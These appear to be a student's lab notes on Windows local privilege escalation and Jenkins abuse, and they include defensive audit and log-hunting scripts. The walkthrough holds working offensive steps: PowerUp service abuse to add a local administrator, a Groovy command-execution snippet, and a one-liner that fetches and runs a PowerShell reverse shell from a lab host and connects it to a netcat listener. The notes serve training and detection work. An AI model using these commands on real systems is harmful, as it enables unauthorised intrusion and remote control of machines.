Win Privesc - Local
The CRTP material on local privesc is not great.
There are various ways of locally escalating privileges on a Windows box:
– Missing patches
– Automated deployment and AutoLogon passwords in clear text
– AlwaysInstallElevated (Any user can run MSI as SYSTEM)
– Misconfigured Services
– DLL Hijacking and more
– NTLM Relaying a.k.a. Won't Fix
We can use the tools below for complete coverage:
Service Issues using PowerUp
Get services with unquoted paths and a space in their name:
Get-ServiceUnquoted -Verbose
Get services where the current user can write to the binary path or change the arguments passed to the binary:
Get-ModifiableServiceFile -Verbose
Get the services whose configuration the current user can modify:
Get-ModifiableService -Verbose
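The check behind Get-ServiceUnquoted is simple enough to reproduce as an audit script, which is useful when you want to verify a finding (or hunt for it fleet-wide) without dropping PowerUp on the box. The script below is an added example, not PowerUp's code: it reads every service's ImagePath, keeps the unquoted ones that contain a space, builds each prefix the service loader would try before the real binary (for C:\Program Files\My App\svc.exe that is C:\Program.exe and C:\Program Files\My.exe), and reports the ones whose parent directory grants the current user CreateFiles. It assumes Windows with PowerShell 5 or later (Get-CimInstance, Get-Acl); the ACL evaluation is a simplified version of NTFS access checking (matching Deny wins over Allow, inheritance flags are ignored).

```powershell
# Added audit script (not PowerUp's code): find unquoted service paths with a
# writable directory on the chain of prefixes the service loader tries first.
# Assumes Windows, PowerShell 5+.

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }

    # SIDs carried by the current token: the user SID plus every group SID
    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $tokenSids = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })

    # CreateFiles (WriteData) is the single right needed to drop a file into the directory
    $createFiles = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles

    try { $acl = Get-Acl -LiteralPath $Directory } catch { return $false }   # no READ_CONTROL: treat as not writable
    $allowed = $false
    foreach ($ace in $acl.Access) {
        try {
            $aceSid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }   # orphaned or unresolvable account
        if ($tokenSids -notcontains $aceSid) { continue }
        if (([int]$ace.FileSystemRights -band $createFiles) -eq 0) { continue }
        # Simplified NTFS evaluation: a matching Deny ACE wins over any Allow ACE
        if ($ace.AccessControlType -eq 'Deny') { return $false }
        $allowed = $true
    }
    return $allowed
}

function Get-UnquotedServicePathRisk {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $raw = [string]$svc.PathName
        # Quoted paths and paths without a space resolve unambiguously: skip them
        if (-not $raw -or $raw.StartsWith('"') -or $raw -notmatch ' ') { continue }

        # Keep the text up to and including the first ".exe"; anything after it is arguments
        $exePath = if ($raw -match '^(.*?\.exe)') { $Matches[1] } else { $raw }
        $tokens  = $exePath -split ' '

        # Every prefix cut at a space is a candidate the loader tries before the real binary
        for ($i = 1; $i -lt $tokens.Count; $i++) {
            $candidate = ($tokens[0..($i - 1)] -join ' ') + '.exe'
            $parentDir = Split-Path -Path $candidate -Parent
            if (-not $parentDir) { continue }
            if (Test-DirectoryWritable -Directory $parentDir) {
                [pscustomobject]@{
                    Service          = $svc.Name
                    RunsAs           = $svc.StartName
                    ImagePath        = $raw
                    WritableDir      = $parentDir
                    LoaderTriesFirst = $candidate
                }
            }
        }
    }
}

Get-UnquotedServicePathRisk | Format-Table -AutoSize
```

A hit is only exploitable in practice when the service also runs as a privileged account (RunsAs) and can be restarted or is started at boot, which is why those columns are included; the remediation is to quote the ImagePath (sc config <name> binPath= "\"C:\Program Files\My App\svc.exe\"") and to remove the write grant on the directory.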
Run all checks with automated tools:
# PowerUp:
Invoke-AllChecks
# Privesc:
Invoke-PrivEsc
# PEASS-ng:
winPEASx64.exe
Feature Abuse
- If you have Admin access (default installation before 2.x), go to http://<jenkins_server>/script
- In the script console, Groovy scripts can be executed.
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
If you don't have admin access but can add or edit build steps in the build configuration, add a build step of type "Execute Windows Batch Command" and enter:
powershell -c <command>
Again, you could download and execute scripts, run encoded scripts and more.
Learning Objective 5:
- Exploit a service and elevate privileges to local administrator.
- Identify a machine in the domain where your user has local administrative access.
- Using privileges of a user on Jenkins get admin privileges on another server.
[easy to detect]
Invoke-ServiceAbuse -Name 'AbyssWebServer' -Username dcorp\studentx -Verbose
net localgroup Administrators
[easy to detect - noisy]
Find-PSRemotingLocalAdminAccess
on Jenkins> powershell iex (iwr -UseBasicParsing http://172.16.100.1/Invoke-PowerShellTcp.ps1); power -Reverse -IPAddress 172.16.100.1 -Port 443
on Attacker> host the file on a web server (example: HFS - HTTP File Server); disable the firewall or add an exception for the port
on Attacker> netcat-win32-1.12.exe -lvp 443
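The notes mark both the service abuse and the Jenkins step as easy to detect, and it is worth seeing what that detection looks like from the other side. The script below is an added example, not part of the original notes or of any tool the notes mention: it walks the Security log for two things, 4688 process-creation events where the Jenkins Java process spawned a shell (both an "Execute Windows Batch Command" build step and a script-console .execute() call produce a cmd.exe or powershell.exe child of java.exe), and 4732 events where a member was added to the built-in Administrators group (what Invoke-ServiceAbuse's net localgroup command ends up doing). It assumes Windows 10 / Server 2016 or later so that 4688 carries ParentProcessName, that "Audit Process Creation" and "Audit Security Group Management" are enabled, and that "Include command line in process creation events" is on if you want the CommandLine column populated; the parent and child image names are parameters so they can be adjusted for a differently packaged Jenkins.

```powershell
# Added detection example (not part of the original notes): hunt the Security log for
# shells spawned by Jenkins (4688) and additions to the local Administrators group (4732).
# Assumes Windows 10 / Server 2016+, process-creation and group-management auditing on.

# Flatten the EventData of a Security event into a hashtable keyed by field name
function ConvertTo-EventDataTable {
    param([Parameter(Mandatory)][System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $table = @{}
    $xml = [xml]$Event.ToXml()
    foreach ($field in $xml.Event.EventData.Data) { $table[$field.Name] = [string]$field.'#text' }
    return $table
}

# 4688: a shell started by the Jenkins Java process. Batch build steps and script-console
# .execute() calls both show up as this parent/child pair.
function Get-JenkinsSpawnedShells {
    param(
        [datetime]$Since = (Get-Date).AddDays(-1),
        [string[]]$ParentNames = @('java.exe'),                           # assumed Jenkins image name
        [string[]]$ChildNames  = @('cmd.exe', 'powershell.exe', 'pwsh.exe')
    )
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = $Since }
    foreach ($ev in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $d = ConvertTo-EventDataTable -Event $ev
        if (-not $d['ParentProcessName'] -or -not $d['NewProcessName']) { continue }
        $parent = Split-Path -Leaf $d['ParentProcessName']
        $child  = Split-Path -Leaf $d['NewProcessName']
        if ($ParentNames -contains $parent -and $ChildNames -contains $child) {
            [pscustomobject]@{
                Time        = $ev.TimeCreated
                User        = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                Parent      = $d['ParentProcessName']
                Child       = $d['NewProcessName']
                CommandLine = $d['CommandLine']   # empty unless command-line auditing is enabled
            }
        }
    }
}

# 4732: a member was added to a security-enabled local group. S-1-5-32-544 is the
# built-in Administrators group, the one a service-abuse privesc adds the user to.
function Get-LocalAdminAdditions {
    param([datetime]$Since = (Get-Date).AddDays(-1))
    $filter = @{ LogName = 'Security'; Id = 4732; StartTime = $Since }
    foreach ($ev in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $d = ConvertTo-EventDataTable -Event $ev
        if ($d['TargetSid'] -ne 'S-1-5-32-544') { continue }
        [pscustomobject]@{
            Time      = $ev.TimeCreated
            AddedBy   = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"   # SYSTEM when a service did it
            MemberSid = $d['MemberSid']
            Member    = $d['MemberName']   # often '-'; resolve MemberSid when that happens
            Group     = $d['TargetUserName']
        }
    }
}

Get-JenkinsSpawnedShells | Format-Table -AutoSize
Get-LocalAdminAdditions  | Format-Table -AutoSize
```

Reading the Security log needs local administrator or membership in Event Log Readers. For the service abuse case the 4732 event is logged with SYSTEM as the subject, since the service itself ran the net command; pairing it with the System log's service start events around the same timestamp identifies which service was used.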